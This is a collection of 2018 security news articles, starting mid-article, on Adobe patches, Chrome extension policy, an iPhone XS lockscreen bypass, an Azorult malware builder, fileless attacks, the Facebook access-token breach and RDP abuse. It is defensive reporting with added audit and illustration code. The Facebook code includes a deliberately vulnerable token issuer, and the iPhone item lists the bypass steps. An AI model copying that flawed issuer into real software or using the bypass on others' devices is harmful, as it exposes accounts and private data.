The list includes 22 out-of-bounds write issues, 7 heap overflows, 7 use-after-free bugs, 3 type confusion issues, one double-free bug, 3 buffer errors, and 3 untrusted pointer dereference bugs – all of these are critical and can be exploited for code execution.

One security bypass issue that can lead to privilege escalation has also been classified as “critical.” The remaining flaws are stack overflow, integer overflow, and out-of-bounds read issues that have been described as “important” and which can lead to information disclosure.

Independent researchers and employees of Qihoo 360, Cisco Talos, Beihang University, Palo Alto Networks, Knownsec, Check Point Software Technologies, and Tencent were credited for reporting these vulnerabilities. Many of the security holes were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

However, the researcher credited for the highest number of bugs is Omri Herscovici, vulnerability research team leader at Check Point. He reported 35 of the flaws patched by Adobe on Monday.

While many of the vulnerabilities have been classified as “critical,” Adobe has assigned the security updates a priority rating of “2,” which indicates that there are no known exploits and the company does not believe exploits are imminent.

Last month, Adobe only patched 7 vulnerabilities in its Acrobat products. However, it’s not uncommon for the company to resolve a large number of security weaknesses in these applications – back in July it fixed over 100.

*Updated the number of patched vulnerabilities from 85 to 86 after obtaining clarifications from Adobe


U.S. Energy Department Invests Another $28 Million in Cybersecurity
2.10.2018 securityweek
BigBrothers

The U.S. Department of Energy on Monday announced that it’s investing up to $28 million in tools and technologies that will improve the resilience and cybersecurity of the power grid and oil and gas infrastructure.

The funding comes from the Office of Cybersecurity, Energy Security, and Emergency Response (CESER), which the DOE launched in February, and it aims to support the strategy described in the agency’s recently unveiled multiyear cybersecurity plan.

The money will support research, development and demonstration (RD&D) of innovative tools and technologies designed for preventing, detecting and mitigating cyber threats.

“Protecting the Nation’s energy delivery systems from cyber-threats is a top national priority,” said U.S. Secretary of Energy Rick Perry. “These awards will spur the next level of innovation needed to advance cyber resilience, ensuring that the Nation’s critical energy infrastructure can withstand potential cyber attacks while also still keeping the lights on.”

There are a total of 11 projects focusing on creating a cyber-resilient architecture for the electric and oil and natural gas subsectors, cybersecurity for oil and natural gas environments, secure communications, secure cloud-based technologies for operational technology (OT) networks, and technologies for enhancing cybersecurity in the energy sector.

Universities, national laboratories, and private-sector companies have teamed up for each of the projects. Award recipients include ABB, Dragos, GE Global Research, Schweitzer Engineering Laboratories (SEL), TDi, the Texas A&M Engineering Experiment Station, the United Technologies Research Center, and WhiteScope.

DOE investing $28 million in cybersecurity

Industrial cybersecurity firm Dragos leads a project called The Neighborhood Keeper, which aims to develop a low-cost, cloud-based sensor network within OT networks to "enable integration of available technologies that will facilitate real-time and actionable information to reduce cyber risk.”

“Dragos is excited to be participating in a DOE program that helps expand accessibility to ICS cybersecurity,” Robert Lee, CEO of Dragos, said via email. “The secure, cost-effective architecture of Neighborhood Keeper is a service to the ICS community that will enable collaborative industrial control systems threat intelligence without the risk of sharing private information.”

This is not the first time the Energy Department has announced significant investment in cybersecurity. Roughly one year ago it offered over $20 million for projects focusing on cybersecurity, and earlier this year it announced awards of up to $25 million for technologies designed to protect the country’s energy infrastructure against cyber threats.


Google Tightens Rules for Chrome Extensions
2.10.2018 securityweek
Privacy

Google this week announced a series of policy changes and updates to improve the overall security of Chrome extensions.

There are currently more than 180,000 extensions available in the Chrome Web Store, and nearly half of Chrome desktop users actively use extensions, which makes the security of these components critical to the user browser experience.

Over the past couple of years, there have been numerous incidents where Chrome extensions were abused for traffic hijacking, click fraud, or adware distribution. After removing inline installation of extensions earlier this year, Google is changing the rules again to better protect Chrome users.

Starting with Chrome 70, users will be able to either restrict extension host access to a custom list of sites, or to configure them to require a click to gain access to the current page, James Wagner, Chrome Extensions Product Manager, reveals.

Host permissions, Wagner notes, allow extensions to automatically read and change data on websites, thus being prone to misuse, either malicious or unintentional. Thus, the search giant has decided to improve user transparency and control over when extensions can access site data and developers are advised to make the necessary changes to their apps as soon as possible.

The review process will tighten for extensions that request powerful permissions, as well as for those that use remotely hosted code, which will be subject to ongoing monitoring, Wagner notes. Developers should ensure their extension’s permissions are as narrowly scoped as possible and that all the code is included directly in the extension package, to minimize review time.
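What "narrowly scoped permissions" and "all code in the package" look like in a manifest is easier to see side by side. The script below is an added example written for this page, not Google's review tooling: it audits a Chrome extension manifest for the two things the tightened review singles out, broad host permissions (match patterns that cover every site) and remotely hosted code (an external origin in the script-src of the extension's content security policy), and reports the weak manifest beside its hardened version. Both manifests and the example.invalid hosts are constructed for the demo; the hardened one uses activeTab, the permission that grants access to the current page only on a user click, in place of a blanket host grant.

```python
"""Audit a Chrome extension manifest for over-broad host permissions and
code loaded from outside the package. Added example, not Google's own
review tooling; both manifests below are constructed for the demo."""
import json

# Match patterns that grant access to every site.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Weak: reads and changes data on every site, and pulls a script from a CDN.
WEAK_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Price Helper",
    "version": "1.0",
    "permissions": ["storage", "tabs", "<all_urls>"],
    "background": {"scripts": ["bg.js"]},
    "content_security_policy":
        "script-src 'self' https://cdn.example.invalid; object-src 'self'",
})

# Hardened: one host pattern plus activeTab (access only on user click),
# and the default CSP, so every script must ship inside the package.
NARROW_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Price Helper",
    "version": "1.1",
    "permissions": ["storage", "activeTab", "https://shop.example.invalid/*"],
    "background": {"scripts": ["bg.js"]},
    "content_security_policy": "script-src 'self'; object-src 'self'",
})


def script_sources(csp):
    """Return the source list of the script-src directive in a CSP string."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            return parts[1:]
    return []


def audit_manifest(text):
    """List review findings for a manifest (MV2 or MV3 layout)."""
    m = json.loads(text)
    findings = []
    # MV2 mixes host patterns into "permissions"; MV3 moves them to "host_permissions".
    host_perms = (m.get("permissions", []) + m.get("optional_permissions", [])
                  + m.get("host_permissions", []))
    for p in host_perms:
        if p in BROAD_HOST_PATTERNS:
            findings.append(f"broad host permission: {p}")
    csp = m.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form: {"extension_pages": "..."}
        csp = csp.get("extension_pages", "")
    for src in script_sources(csp):
        if src.lower().startswith(("http:", "https:")):
            findings.append(f"remote script origin allowed: {src}")
    return findings


if __name__ == "__main__":
    for label, manifest in (("weak", WEAK_MANIFEST), ("narrow", NARROW_MANIFEST)):
        print(label, audit_manifest(manifest) or "no findings")
```

The CSP check is the mechanical way to catch remotely hosted code: an extension whose script-src lists nothing but 'self' cannot load a script from a server at all, so a reviewer knows the package they see is the code that runs.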

Starting October 1, extensions with obfuscated code are no longer allowed in the Chrome Web Store, regardless of whether the obfuscation is applied to code within the package or to external code or resources. Existing extensions with obfuscated code will be removed in early January, provided that they don’t receive updates to become compliant.

“Today over 70% of malicious and policy violating extensions that we block from Chrome Web Store contain obfuscated code. At the same time, because obfuscation is mainly used to conceal code functionality, it adds a great deal of complexity to our review process. This is no longer acceptable given the aforementioned review process changes,” Wagner points out.

Extension developers are still allowed to use minification, which not only speeds up code execution by reducing size, but also makes extensions more straightforward to review. Techniques that are allowed include removal of whitespace, newlines, code comments, and block delimiters; shortening of variable and function names; and collapsing the number of JavaScript files.

Starting in 2019, Google will also require all Chrome Web Store developer accounts to enroll in 2-Step Verification. This should add extra protection to prevent incidents where attackers attempt to steal popular extensions by hijacking the developer account.

“For even stronger account security, consider the Advanced Protection Program. Advanced protection offers the same level of security that Google relies on for its own employees, requiring a physical security key to provide the strongest defense against phishing attacks,” Wagner says.

Next year, Google also plans on introducing the next extensions manifest version, which should improve security, privacy, and performance. It will bring more narrowly-scoped and declarative APIs, easier mechanisms for users to control the permissions granted to extensions, and alignment with new web capabilities, such as supporting Service Workers as a new type of background process.

“We recognize that some of the changes announced today may require effort in the future, depending on your extension. But we believe the collective result will be worth that effort for all users, developers, and for the long term health of the Chrome extensions ecosystem. We’re committed to working with you to transition through these changes and are very interested in your feedback,” Wagner concludes.


Passcode Bypass Method Exposes Photos, Contacts on iPhone XS
2.10.2018 securityweek
Apple

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.

Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” found several passcode bypass techniques in the past and he has now identified another one.

As with all passcode bypass methods, physical access to the targeted device is required. Another prerequisite is that Siri needs to be enabled and Face ID has to be disabled for the hack to work.

The technique involves asking Siri to enable VoiceOver, an accessibility feature that allows users with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The next step is to call the locked device so that the “Messages” icon appears on the screen. Once the messages menu is opened by selecting the “custom” option, a notification needs to be triggered on the targeted iPhone (e.g. by sending it a text, Facetime or Telegram message). When the notification is displayed, a double tap on the screen reveals a white page that contains hidden buttons and functions.

The VoiceOver feature allows the hacker to navigate through and use these buttons, including to access contacts and photos stored on the phone.

Apple likely intended to keep these buttons hidden while the iPhone was locked, but it appears that they are still visible and usable by the VoiceOver system.

While contact information is easier to obtain, the attacker has to blindly pick which photos from the gallery they want displayed.

The YouTube channel EverythingApplePro, which also published a video confirming the method, reported that the technique even works on iOS 12.1 beta.

SecurityWeek has reached out to Apple to find out if the company is aware of the new security bypass flaw and if it plans on releasing a patch. While in the past the tech giant managed to patch some lockscreen bypass vulnerabilities through server-side changes, the latest method may require an iOS update.

A second video posted by Rodriguez appears to show that the invisible menus can also be accessed by using Siri to create notes and activating the VoiceOver features. This method does not require calling or messaging the targeted phone.


The ‘Gazorp’ Azorult Builder emerged from the Dark Web
2.10.2018 securityaffairs
Virus

Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.
Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.

The Gazorp builder allows crooks to generate, free of charge, malicious code that steals passwords, payment information, cryptocurrency wallet data and more.

“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.

“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”

Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.

Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.

Gazorp Azorult Builder

This version of the malware was observed in the wild five months ago; since then it has been updated twice, and experts have discovered versions 3.1 and 3.2 in live attacks.

Azorult has been around since at least 2016. Malware researchers at Proofpoint spotted a new version of the AZORult spyware in the wild, involved in a large email campaign on July 18, just 24 hours after it appeared in cybercrime forums on the Dark Web.

Experts also noted that Gazorp’s emergence on the Dark Web was the result of the leak of the code for the Azorult’s panel (for versions 3.1 and 3.2).

The availability of the code allows anyone to easily create their own version of the Azorult C&C panel; the experts added that the leak also contained a builder for the latest version of the malware. This builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”

“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.

The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.

Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.

Experts believe we may soon see a spike in campaigns leveraging Azorult info-stealer samples generated with the Gazorp builder.

“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.

“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”


Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
2.10.2018 securityaffairs
Vulnerability

Adobe has released security updates to fix 86 vulnerabilities in the Mac and Windows versions of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.
Adobe has released security updates to address 86 vulnerabilities affecting the Mac and Windows versions of Adobe Acrobat and Adobe Reader. The security updates fix 47 vulnerabilities classified as ‘critical’ and 39 flaws classified as ‘important’.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The 46 critical vulnerabilities could be exploited by attackers to execute arbitrary code on vulnerable systems; the remaining one is a privilege escalation bug. All 39 flaws classified as ‘important’ are information disclosure issues.

Users can update their installations manually by choosing Help > Check for Updates; the full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.

Adobe Acrobat and Adobe Reader users should install the latest versions as soon as possible (Acrobat DC and Acrobat Reader DC version 2019.008.20071, Acrobat 2017 and Acrobat Reader DC version 2017.011.30105, Acrobat DC 2015 and Acrobat Reader DC 2015 versions 2015.006.30456).

The security advisory includes the full list of patched vulnerabilities and organizations or experts that reported them.


Fileless Malware Attacks on the Rise, Microsoft Says
2.10.2018 securityweek
Virus

Fileless malware attacks, or incidents where the malicious payload doesn’t touch the disk, but is executed directly in memory instead, are on the rise, Microsoft says.

Attacks that leverage fileless techniques are not new, but they have recently been adopted by a broader range of malware. A couple of years ago, the Kovter Trojan was well known for the use of this infection method, but various threat actors, ransomware, and even crypto-mining malware have adopted it since.

Last November, a Barkly report suggested that fileless assaults were ten times more likely to succeed compared to other infection methods.

Now, Microsoft says that the move to fileless techniques was only the next logical step in the evolution of malware, especially with antivirus solutions becoming increasingly efficient at detecting malicious executables.

“Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis,” Andrea Lelli of the Windows Defender Research team at Microsoft notes in a blog post.

“Removing the need for files is the next progression of attacker techniques,” Lelli says.

The result of this is an increase in attacks that use malware with fileless techniques, where the executable is never dropped on the disk. The approach not only removes the need to rely on physical files, but also improves stealth and persistence.

For attackers, this also means the discovery of new techniques for executing the code, which some solved by infecting legitimate components and achieving execution in these components’ environment. Referred to as “living off the land”, the technique usually abuses tools that are already available on the platform, such as mshta.exe.

As Lelli points out, however, there is no generally accepted definition of a fileless attack, and even malware families that do rely on files to operate are included. Thus, some parts of the attack might be fileless, while others would still rely on the filesystem.

Overall, Microsoft groups fileless threats into different categories, based on entry point (execution/injection, exploit, hardware), the form of entry point (file, script, etc.), and the host of the infection (Flash, Java, documents), which results in three big types of fileless threats.

The malware can be completely fileless (performing no file activity), writes no files to disk but still uses some files indirectly, or requires the use of files to achieve fileless persistence.

While file-based inspection is ineffective against fileless malware, behavioural analytics and other technologies should be efficient in detecting such attacks.

Microsoft itself has integrated its Windows Defender Advanced Threat Protection (ATP) with capabilities such as behaviour monitoring, memory scanning, and boot sector protection, to detect and terminate threat activity at runtime.

Furthermore, Windows Defender ATP integrates with Antimalware Scan Interface (AMSI), “an open framework that applications can use to request antivirus scans of any data,” to defend against fileless malware and other threats, Microsoft says.

When it comes to fighting fileless attacks that live off the land, behaviour monitoring is particularly useful, Lelli says. In fact, Microsoft has long been touting Windows 10’s ability to detect in-memory attack methods that abuse legitimate processes.

Memory scanning is also useful when it comes to detecting the presence of malicious code in the memory of a running process. Even malware that runs without the use of a physical file (such as the GandCrab ransomware) needs to reside in memory to operate, and memory scanning can detect it there, Lelli points out.

Another defense that’s effective against fileless attacks is boot sector protection. In Windows 10, controlled folder access prevents write operations to the boot sector, thus helping Windows Defender ATP stop attack vectors used by Petya, BadRabbit, and bootkits.

“As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too,” Microsoft concludes.


Several Bugs Exploited in Massive Facebook Hack
2.10.2018 securityweek
Social

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code and use it to access the targeted user’s account. An attacker would first have to target one of their friends’ accounts and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.
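The three bugs described above amount to a token-confusion flaw: a write path that should not exist in a read-only preview, a token minted with broader permissions than the action needs, and a token subject taken from the profile being viewed rather than the logged-in user. The following toy model, added here and not Facebook's code, puts the vulnerable issuer beside a hardened one; the names Session, issue_upload_token_buggy, issue_upload_token_fixed and enforce_binding are assumptions for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Session:
    """Who is actually logged in, and whether they are in 'View As' mode."""
    user_id: str                   # the authenticated principal
    view_as: Optional[str] = None  # profile being previewed, if any
    read_only: bool = False        # 'View As' must render a read-only page


def issue_upload_token_buggy(session: Session, profile_id: str) -> Dict[str, str]:
    """Toy model of the three bugs (illustrative, not Facebook's code):
    1. a write action (posting a video) is accepted in read-only 'View As' mode,
    2. the uploader mints a token carrying the mobile app's broad permissions,
    3. the token's subject is the profile being viewed, not the acting user.
    """
    # No read-only check, broad scope, and a caller-controlled subject.
    return {"sub": profile_id, "scope": "mobile_app_full"}


def issue_upload_token_fixed(session: Session, profile_id: str) -> Dict[str, str]:
    """Hardened issuer: refuse writes while previewing, bind the token to the
    authenticated principal only, and scope it to the single action needed."""
    if session.read_only or session.view_as is not None:
        raise PermissionError("uploads are not permitted in 'View As' preview")
    if profile_id != session.user_id:
        raise PermissionError("a token may only be minted for the session owner")
    return {"sub": session.user_id, "scope": "upload_video"}


def token_grants_access(token: Dict[str, str], target_profile: str) -> bool:
    """Data-layer rule: a token unlocks only the profile it is bound to."""
    return token["sub"] == target_profile


def enforce_binding(session: Session, token: Dict[str, str]) -> Dict[str, str]:
    """Facade-style invariant checked on every token leaving the issuer:
    the subject must be the session principal. This catches bug 3 even if
    an individual issuer regresses."""
    if token["sub"] != session.user_id:
        raise RuntimeError("token subject does not match the session principal")
    return token


def demo() -> Dict[str, bool]:
    """Replays the flaw and the fix; returns what each path allowed."""
    alice_preview = Session("alice", view_as="bob", read_only=True)

    # Buggy path: Alice previews her profile as Bob and receives Bob's token.
    leaked = issue_upload_token_buggy(alice_preview, "bob")
    buggy_opens_bob = token_grants_access(leaked, "bob")

    # The invariant check would have refused to hand that token out.
    try:
        enforce_binding(alice_preview, leaked)
        invariant_caught = False
    except RuntimeError:
        invariant_caught = True

    # Fixed path: no token at all while in preview ...
    try:
        issue_upload_token_fixed(alice_preview, "bob")
        fixed_refuses_preview = False
    except PermissionError:
        fixed_refuses_preview = True

    # ... and a normal upload yields a narrowly scoped token for Alice only.
    own = issue_upload_token_fixed(Session("alice"), "alice")
    fixed_opens_bob = token_grants_access(enforce_binding(Session("alice"), own), "bob")

    return {
        "buggy_opens_bob": buggy_opens_bob,
        "invariant_caught": invariant_caught,
        "fixed_refuses_preview": fixed_refuses_preview,
        "fixed_opens_bob": fixed_opens_bob,
    }


if __name__ == "__main__":
    print(demo())
```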

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning on Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

Impact on Facebook

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


California IoT Cybersecurity Bill Signed into Law
2.10.2018 securityweek
IoT

California Governor Jerry Brown last week signed the country’s first Internet of Things (IoT) cybersecurity law, along with a controversial state-level net neutrality law.

The IoT cybersecurity law, SB-327, was introduced in February 2017 by Senator Hannah-Beth Jackson (D-Santa Barbara). SB-327 goes into effect on January 1, 2020, and it requires manufacturers of Internet-connected devices – such as TVs, phones, toys, household appliances and routers – to ensure that their products have “reasonable security features.” These security features should be able to protect sensitive customer information from unauthorized access.

“The lack of basic security features on internet connected devices undermines the privacy and security of California’s consumers, and allows hackers to turn everyday consumer electronics against us,” said Sen. Jackson. “SB 327 ensures that technology serves the people of California, and that security is not an afterthought but rather a key component of the design process.”

Veteran cybersecurity expert and cryptographer Bruce Schneier, who helped draft the IoT Cybersecurity Improvement Act of 2017, applauded the initiative, telling The Washington Post that it will “help everybody” even if “it probably doesn’t go far enough.” The IoT Cybersecurity Improvement Act of 2017, which could force security into IoT, has not made it past the Senate Committee on Homeland Security and Governmental Affairs.

Others have outright called the new SB 327 law “bad.” One of its biggest critics is Robert Graham of Errata Security, who described it as a “typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little to improve security, while doing a lot to impose costs and harm innovation.”

Gov. Brown last week also signed what have been described as the strictest net neutrality protections in the United States. Washington, Vermont and Oregon have also passed their own net neutrality regulations, and others will likely follow.

The Department of Justice claims the law, SB 822, is illegal. U.S. Attorney General Jeff Sessions argued that the Constitution prohibits states from regulating interstate commerce.

“Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy. The Justice Department should not have to spend valuable time and resources to file this suit today, but we have a duty to defend the prerogatives of the federal government and protect our Constitutional order,” Sessions said.

Unsurprisingly, the representatives of U.S. telecoms companies also oppose the legislation.

“Broadband providers strongly support net neutrality, but SB 822 undercuts California’s long history as a vibrant catalyst for innovation and technology,” said Jonathan Spalter, President and CEO of broadband industry lobbying group USTelecom. “The internet must be governed by a single, uniform and consistent national policy framework, not state-by-state piecemeal approaches. Governor Brown should use his veto pen on this legislation, and Congress should step in to legislate and provide consumer protections that will resolve this issue once and for all.”

On the other hand, many activists and Internet freedom supporters praise California for the law.

“This victory in California is a testament to the power of the free and open Internet to defend itself. And it’s a beacon of hope for Internet users everywhere who are fighting for the basic right to express themselves and access information without cable and phone companies controlling what they can see and do online.” said Evan Greer, deputy director of Fight for the Future, a digital rights group that played an important role in passing SB 822.

“Despite their army of lobbyists and millions spent lining the pockets of legislators, these companies continue to lose ground in the face of overwhelming cross-partisan opposition to their greedy attacks on our Internet freedom. When all is said and done, Comcast, Verizon, and AT&T are going to wish they’d never picked a fight with Internet over net neutrality. Other states should follow California’s lead, and Congress should pass the joint resolution to reverse the FCC’s resoundingly unpopular repeal,” Greer added.


The Scandals Bedevilling Facebook
2.10.2018 securityweek
Social

Facebook is at the centre of controversy yet again after admitting that up to 50 million accounts were breached by hackers.

Facebook chief executive Mark Zuckerberg said engineers discovered the breach on Tuesday, and patched it on Thursday night.

"We don't know if any accounts were actually misused," Zuckerberg said. "We face constant attacks from people who want to take over accounts or steal information around the world."

Facebook reset the 50 million breached accounts, meaning users will need to sign back in using passwords. It also reset "access tokens" for another 40 million accounts as a precautionary measure.

Here is a roundup of the scandals dogging the social media giant.

- Cambridge Analytica -

In Facebook's telling, everything goes back to 2013 when Russian-American researcher Aleksandr Kogan creates a personality prediction test app, "thisisyourdigitallife", which is offered on the social network.

Around 300,000 people download the app, authorising access to information on their profile and also to the data of their Facebook friends.

In 2015 Facebook makes changes to its privacy policy and prevents third-party apps from accessing the data of users' friends without their consent.

The same year the social network discovers Kogan has passed on the information retrieved via his app to the British company Cambridge Analytica (CA), which specialises in the analysis of data and strategic communication.

In 2016 CA is hired by Donald Trump's US presidential campaign.

Facebook says it was assured by CA in 2015 that the data in question had been erased. But it estimates the firm could have had access to the data of up to 87 million users, most in the United States, without their consent, and mined this information to serve the Trump campaign.

Cambridge Analytica, which denies the accusations, has since filed for voluntary bankruptcy in the United States and Britain.

Facebook is accused of having been lax in its protection of user data, slow to intervene and consistently vague on its privacy settings.

In 2011 it signed a consent decree with US consumer protection agency the Federal Trade Commission (FTC) settling charges that it deceived consumers by telling them they could keep their information on Facebook private, and then allowing it to be shared and made public.

In March this year the FTC said it had opened an inquiry into Facebook's privacy practices, including whether the company violated the earlier agreement, which would incur hefty fines.

Beyond the CA scandal, Facebook estimates the data of nearly all its users may have, at some time, been retrieved without their knowledge.

- Political manipulation -

Facebook and sites like Google, Twitter and Tumblr are also accused of having allowed the spread through their networks of "fake news", including to manipulate public opinion ahead of the US election in favour of Trump.

The sites have acknowledged finding on their platforms messages, accounts and pages associated with the Internet Research Agency, a Saint Petersburg operation that is alleged to be a "troll farm" connected to the Russian government.

It is accused of spreading disinformation and propaganda including via postings -- often in the form of sponsored ads that target users based on their personal data -- that could influence opinion, for example over immigration.

According to Facebook, more than 120 million users had seen such content.

Facebook is in particular accused of not having been vigilant enough on monitoring the content and authenticity of pages and political ads that it carries.

It announced this year that it will require that the sponsors of political ads are identified and verified.

Earlier this month, Zuckerberg said Facebook was better prepared to defend against efforts to manipulate the platform to influence elections.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."


RDP Increasingly Abused in Attacks: FBI
2.10.2018 securityweek
Attack

Cyberattacks leveraging the remote desktop protocol (RDP) have been on the rise for the past couple of years, fueled by the emergence of dark markets selling RDP access, the Federal Bureau of Investigation (FBI) warns.

Malicious actors have created new methods of identifying and exploiting vulnerable RDP sessions over the web and both businesses and private users should take steps to reduce the likelihood of compromise, a joint alert from the FBI and Department of Homeland Security (DHS) reads.

RDP provides users with the ability to control a remote machine over the Internet. While authentication with a username and password is required to establish a remote desktop connection, attackers can infiltrate such connections and inject malware onto the remote system.

Assaults that abuse RDP do not require user input and the intrusion is difficult to detect. By abusing RDP sessions, malicious actors can compromise identities, steal login credentials, and ransom other sensitive information, the alert reads.

To perform RDP attacks, hackers target weak passwords (those which contain dictionary words or do not include a mixture of uppercase/lowercase letters, numbers, and special characters) and flaws in outdated versions of RDP, but also abuse unrestricted access to the default RDP port (TCP 3389) and unlimited login attempts to a user account.

Some of the threats known to abuse RDP include the CrySIS ransomware (primarily targeting US businesses, it demands a payment in Bitcoin in exchange for a decryption key), CryptON ransomware (which allows actors to manually execute malicious programs on the compromised machine), and Samsam ransomware (which is estimated to have generated over $6 million in revenue to its operator).

“Threat actors buy and sell stolen RDP login credentials on the Dark Web. The value of credentials is determined by the location of the compromised machine, software utilized in the session, and any additional attributes that increase the usability of the stolen resources,” the FBI alert reads.

Because the use of RDP creates risk, given the ability to remotely control a system entirely, the FBI and DHS recommend closely regulating, monitoring, and controlling usage. This includes auditing networks for systems using RDP and disabling the service where it is not needed.

Businesses should also verify that cloud-based virtual machine instances with a public IP do not have open RDP ports unless needed, and should place systems with an open RDP port behind a firewall. Furthermore, they should require the use of a Virtual Private Network (VPN) for RDP access.

The use of strong passwords and account lockout policies should help defend against brute-force attacks, as should two-factor authentication. Keeping systems and software updated should eliminate vulnerabilities, while a good back-up strategy ensures that systems can be easily restored in case of an attack.

Organizations should also enable logging to capture RDP logins, adhere to the cloud provider's best practices for remote access when creating cloud-based virtual machines, and require that third parties follow internal policies on remote access.

The FBI and DHS also recommend that businesses minimize network exposure for all control system devices and remove RDP from critical devices where possible, as well as regulate and limit external-to-internal RDP connections.
